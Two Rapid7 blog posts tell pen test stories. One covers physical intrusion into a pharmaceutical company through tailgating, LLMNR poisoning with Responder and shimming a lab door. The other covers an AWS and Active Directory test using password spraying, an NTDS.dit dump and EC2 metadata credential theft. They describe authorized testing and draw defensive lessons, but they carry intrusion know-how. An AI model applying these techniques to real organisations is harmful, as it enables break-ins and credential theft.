At Rapid7 we love a good pen test story. So often they show the cleverness, skill, resilience, and dedication to our customer’s security that can only come from actively trying to break it! In this series, we’re going to share some of our favorite tales from the pen test desk and hopefully highlight some ways you can improve your own organization’s security.

Rapid7 was tasked with performing a physical social engineering engagement for a pharmaceutical company. Physical social engineering penetration tests involve actually entering the physical space of the target. In this case, we were able to enter the facility via tailgating behind an unsuspecting employee.

After gaining access inside the client’s office space, I traversed multiple floors without having a valid RFID badge thanks to even more tailgating and unassuming employees. When I reached an unattended conference room, I was able to plug a laptop into the network due to lack of network access controls. I employed a tool called ‘Responder.py’ to perform Man-in-the-Middle (MitM) attacks by poisoning LLMNR/NBNS requests. This allowed me to gather usernames and password hashes for multiple employees, as well as perform ‘relay’ attacks. The password hashes were then placed on a password cracking server to let the relay attempts run for a bit before I exited the conference room to identify additional points of interest for the assessment. I was able to exit the building that first day without ever being stopped or questioned by anyone.

Upon my return the following day, I again tailgated into the facilities and returned to the same conference room to check the status of the password cracking attempts; only to discover that none of the hashes were cracked. Obviously with more time and additional password cracking attempts the results may have been different. Having been unsuccessful at this first attempt I looked around for other ‘quick wins’ such as missing critical patches but was unable to discover any attack paths that way.

While performing network testing, I noticed an employee hovering around outside the conference room door only to quickly disappear after being seen. I continued testing for another few minutes before noticing the same employee nearby. While I was unable to ascertain the reasoning for this employee’s presence, to avoid being compromised, I packed up my equipment and exited the conference room to focus on other goals that were prioritized over network testing.

Entering the Laboratory

Part of our task from the client was to see if I could gain access to multiple biology labs that stored several dangerous chemicals as well as expensive testing equipment. Turns out, it wasn’t terribly difficult. The first lab was completely unattended and I was able to enter thanks to a door that was not fully closed. The second lab was accessed compliments of a significant gap between the door’s plunger and strike plate, which allowed me to use my hotel room key to shim the door open. This gave me access to more dangerous (and dangerously unattended) chemicals. I then accessed the 5th floor labs through even more tailgating and unassuming employees. The 5th floor labs actually had people in them but nobody stopped and questioned me, a complete stranger. This pen test really highlights the benefits of Security Awareness Training and physical social engineering engagements!

The Boss’ Office

The final demonstration of impact came when the point-of-contact for the engagement asked if we could enter at least one of a few executives' offices and leave a message on their dry erase board stating ‘I was here - A Pentester.’ After a little while, I got my chance to tag an executive’s office to really help demonstrate the impact/importance of security of all kinds, not just your network.

While making our way through our client’s office spaces on the last day, I was finally stopped and questioned. I informed this gentleman that I was working with [Point-of-Contact’s Name] performing a wireless survey of their networks. He informed me that he knew I worked for their company because I had a badge. Their badges did not contain their picture or any other information, it was totally blank. My badge was blank too (Pro Tip: don’t assume someone works there based on a blank RFID badge). I told this fella that it was good that he stopped and questioned me because you never know who somebody is or if they are who they say they are. He completely agreed, shook my hand and told me to have a nice day.

Few things highlight the need for robust employee security training more than a successful physical social engineering pen test. Ensuring your workforce is thinking critically about security goes beyond the ability to sniff out a phishing email and into securing the physical space they occupy. A good security plan is essential lest you be visited by a clandestine attacker.

Check us out at this year's Black Hat USA in Las Vegas! Our experts will be giving talks and our booth will be staffed with many members of our team. Stop by and say hi

PenTales: There Are Many Ways to Infiltrate the Cloud

At Rapid7 we love a good pen test story. So often they show the cleverness, skill, resilience, and dedication to our customer’s security that can only come from actively trying to break it! In this series, we’re going to share some of our favorite tales from the pen test desk and hopefully highlight some ways you can improve your own organization’s security.

Rapid7 was engaged to do an AWS cloud ecosystem pentest for a large insurance group. The test included looking at internal and external assets, the AWS cloud platform itself, and a configuration scan of their AWS infrastructure to uncover gaps based on NIST’s best practices guide.

I evaluated their external assets but most of the IPs were configured to block unauthorized access. I continued to test but did not gain access to any of the external assets since, with cloud, once access has been blocked from the platform itself there is not a lot that I could do about it. But nevertheless, I continued to probe for cloud resources, namely S3 buckets, AWS Apps etc., using company-based keywords. For example: companyx, companyx.IT, companyx.media, etc.  Eventually, I found S3 buckets that were publicly available on their external network. These buckets contained sensitive information which definitely was a point of action for the client.

My next step was to complete a configuration scan of their AWS network, which provided complete visibility into their cloud infrastructure, including the resources that were running, the roles attached to the resources, the open services, etc. It also provided the customer valuable insights on the security controls that were missing based on the NIST’s best practices guide like the list of unused access keys, unencrypted disk volumes, keys that are not rotated every 90 days, insufficient logging, publicly accessible services like SSH, RDP, and many more. This scan was done using Rapid7’s very own InsightCloudSec tool which provides customers visibility into their cloud network and helps them identify gaps.

When testing the AWS cloud platform with the read-only credentials provided by the customer, I found they were locked with a strong IAM policy which allowed viewing of only cloud resources on the platform. However, there were no weaknesses in the IAM policy after attempts to enumerate vulnerabilities. This will be important later on!

Hardcoded credentials were found in Functions Apps and EC2 instance data but I was unable to utilize this further to escalate privileges. After enumerating the S3 buckets using the read-only credentials multiple S3 buckets containing customer invoices and payment data, along with Infrastructure-as-a-code files were found.  This provided information about how the customer managed their automated deployments. Beyond this, we were unable to find any vulnerabilities to escalate privileges, however, all the data accumulated during the phase was kept handy in case there would be a chance to chain vulnerabilities together and gain access during the next phases of the pentest. Although it was frustrating to not be able to find any ways to escalate privileges from the platform itself, enumerating it gave me plenty of understanding about their environment which would prove useful in the next phase.

In the final phase of the test, I tested all of the internal assets that were in-scope. These were primarily windows servers on EC2 instances hosting different kinds of services and applications. I enumerated the Active Directory Domain controllers on these servers and found that some AD servers allowed for NULL session enumeration which means you could connect to the AD server and dump out all of the domain information like users, groups, and password policies, without authentication.

Password spray attacks were deployed after all the users from the Domain were accessed. Pretty quickly, it was clear there were multiple users using weak passwords like Summer2023, Winter23, or Password1. Many accounts were even sharing the same passwords! This provided plenty of compromised credentials allowing me to go through the access levels provided to these compromised accounts. I found one account with Domain Admin access and dumped the NTDS.dit file from the AD Servers which contained hashes for all the domain users. With this, several accounts with weak passwords were cracked.

With access to multiple accounts in the bag, the only goal left was to gain some sort of access on the AWS platform. With all the data gathered from the AWS cloud platform test, I first looked at the EC2 Instances on the platform and what roles were assigned to each of them. Then I assessed accounts which had admin access. I found an ‘xx-main-ec2-prod’ role attached to an EC2 instance for which I had admin access through one of the compromised accounts. Using RDP to login to the EC2 instance, I pinged the IAM meta-data server and got the temporary AWS credentials for the ‘xx-main-ec2-prod’ role.

With these credentials, I created a new AWS profile and enumerated the permissions associated with this role. The ‘xx-main-ec2-prod’ role had access to list secrets in the AWS account, put and delete objects on all S3 buckets, send OS commands to all EC2 instances in the AWS account, and modify logs, as well. I proceeded to list some secrets in the AWS account to confirm the access that we had gained. With this level of access, I was able to show the client how an attacker could escalate privileges on their AWS platform.

In the end, this testing highlights how vast the attack surface would be on the cloud network. Even if you’ve locked down your cloud platform, the infrastructure assets could be vulnerable allowing attackers to compromise them and then laterally move to the cloud network. As organizations move their networks to the cloud, it would be important for them not to simply depend on the cloud platform to secure their network but also ensure that their individual assets are continuously tested and secured.

Check us out at this year's Black Hat USA in Las Vegas! Our experts will be giving talks and our booth will be staffed with many members of our team. Stop by and say hi.